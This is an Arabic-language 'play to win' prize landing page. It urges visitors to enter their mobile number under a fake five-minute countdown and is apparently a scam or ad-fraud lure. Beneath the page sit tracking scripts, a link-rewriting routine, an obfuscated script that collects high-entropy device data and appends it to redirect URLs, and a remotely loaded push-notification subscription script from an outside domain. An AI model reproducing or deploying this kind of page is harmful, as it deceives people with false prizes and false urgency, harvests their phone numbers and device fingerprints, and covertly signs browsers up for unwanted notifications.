<!doctype html>
<html lang="en">

<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<!--Optional, send client hints to get accurate device data-->
	<meta http-equiv="delegate-ch" content="sec-ch-ua https://jbhqbx.mcgo2.com; sec-ch-ua-mobile https://jbhqbx.mcgo2.com; sec-ch-ua-arch https://jbhqbx.mcgo2.com; sec-ch-ua-model https://jbhqbx.mcgo2.com; sec-ch-ua-platform https://jbhqbx.mcgo2.com; sec-ch-ua-platform-version https://jbhqbx.mcgo2.com; sec-ch-ua-bitness https://jbhqbx.mcgo2.com; sec-ch-ua-full-version-list https://jbhqbx.mcgo2.com; sec-ch-ua-full-version https://jbhqbx.mcgo2.com" />

	<!-- MaxConv Tracking Script Base Code-->
	<script>!function(w,d,o,n,c){w[o]=w[o]||function(){(w[o].q=w[o].q||[]).push(arguments)};var s=d.createElement(n),t=d.getElementsByTagName(n)[0];s.async=!0;s.defer=!0;s.src="https://jbhqbx.mcgo2.com/t/t.js";t.parentNode.insertBefore(s,t);}(window,document,"maxconv","script");</script>
	<noscript><link rel="stylesheet" href="https://jbhqbx.mcgo2.com/t/t.css?mc_ns=1" /></noscript>
	<!-- End MaxConv Tracking Script Base Code-->

	<title>يا إلهي</title>

	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">

	<style>
		body {
			background: grey;
			margin: 10px
		}
		
		.container {
			background: #fff;
			max-width: 300px;
		}
		
		h1 {
			margin-top: 10px;
			text-align: center;
		}
		
		.timer {
			color: red;
			font-weight: bold;
			font-size: 22px;
		}
		
		.small {
			font-size: 12px;
			color: grey;
		}
		.btn {
            background-color: #3498db;
            color: white;
            padding: 12px 24px;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            animation: pulse 2s infinite;
        }
        @keyframes pulse {
            0% {
                box-shadow: 0 0 0 0 rgba(52, 152, 219, 0.7);
            }
            70% {
                box-shadow: 0 0 0 10px rgba(52, 152, 219, 0);
            }
            100% {
                box-shadow: 0 0 0 0 rgba(52, 152, 219, 0);
            }
        }
		.title-container {
       display: flex;
       justify-content: center;
       align-items: center;
       margin-bottom: 10px;
   }
   .logo {
       width: 30px;
       height: 30px;
       margin-right: 10px; /* 为阿拉伯语添加左侧间距 */
   }
	</style>

	<!-- propush goes here -->
	<!-- back button goes here -->
</head>

<body>
	<div class="container">

		<div class="row">

			<div class="col-sm-12">
				<div class="title-container">
					<h1>العب للفوز</h1>
					<img src="4e87a3c562c6e9e1aff2095d9de1a03.jpg" alt="Logo" class="logo">
				</div>
				<!-- headline -->
				<!-- <h1>العب للفوز</h1> ->
				

				<!-- image -->
				<p>
				<!-- <img src="https://via.placeholder.com/300" width="100%" alt="يا إلهي" /> -->
					<img src="w700d1q75cms.jpg" width="100%" alt="يا إلهي" />
					
				</p>

				<!-- subheading -->
				<p class="lead">
					لم أرَ لعبة سهلة كهذه من قبل حيث يمكنك الفوز بالجائزة الكبرى بعد اجتياز المستوى الأول! قم بدعوة أصدقائك للعب وستحصل على فرصة أكبر للفوز!
				</p>

				<!-- sentence to convince -->
				<p>
					👇أدخل رقم هاتفك الخلوي والعبوا معًا! التأهل صالح لمدة 5 دقائق
				</p>

				<!-- timer -->
				<p align="center" class="timer" id="timer">5:00</p>

				<!-- call to action -->
				<p align="center">
					<!--  <a href="https://m.bolo2vas31.click/c/n/248493/4847" class="btn btn-primary btn-lg">غيِّروا حياتكم</a>-->
					<a href="https://jbhqbx.mcgo2.com/click" class="btn btn-primary btn-lg mainButton">العب الآن</a>
					
				</p>

				<!-- optional -->
				<p class="small">
					Valid on: <span id="date"></span>
				</p>

			</div>

		</div>

	</div>

	<script>
		var timeoutHandle;

		function countdown(minutes) {
			var seconds = 60;
			var mins = minutes

			function tick() {
				var counter = document.getElementById("timer");
				var current_minutes = mins - 1
				seconds--;
				counter.innerHTML =
					current_minutes.toString() + ":" + (seconds < 10 ? "0" : "") + String(seconds);
				if (seconds > 0) {
					timeoutHandle = setTimeout(tick, 1000);
				} else {
					if (mins > 1) {
						setTimeout(function() {
							countdown(mins - 1);
						}, 1000);
					}
					if (counter.innerHTML === '0:00') {
						counter.innerHTML = t;
						counter.classList.remove("b");
					}
				}
			}
			tick();
		}
		countdown(5);
	</script>

	<script>
  var cta = 'mainButton';
  var urlParams = new URLSearchParams(window.location.search);

  var back = 'https://jbhqbx.mcgo2.com/visit/896989ef-c6a3-43ed-b1ab-7f0a8e023680?sc=bbr_2&'+urlParams.toString()
  var under = 'https://jbhqbx.mcgo2.com/click?sc=u&'+urlParams.toString()
	
  var aElements = document.getElementsByTagName('a');
  console.log(aElements)
  for (var i = 0; i < aElements.length; i++) {
	var aElement = aElements[i];
		var href = aElement.getAttribute('href');
		if (!aElement.hasAttribute('href')) {
			continue;  // 跳过没有 href 属性的 <a> 标签
		}
		// 在 URL 的查询字符串之前添加一个 "?"
		if (urlParams.toString()) {
			href += (href.includes('?') ? '&' : '?') + urlParams.toString();
		}
		aElement.setAttribute('href', href);
    }
</script>
<script src="script.js"></script>

<script>
	var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]);
	var s = document.createElement('script');
	s.src='//beevakum.net/452/21aa4/mw.min.js?z=8060728'+'&sw=/sw-check-permissions-66175.js';
	s.onload = function(result) {
		switch (result) {
			case 'onPermissionDefault':break;
			case 'onPermissionAllowed':break;
			case 'onPermissionDenied':break;
			case 'onAlreadySubscribed':break;
			case 'onNotificationUnsupported':break;
		}
	};
	document.head.appendChild(s);
</script>

	
	

</body>

</html>
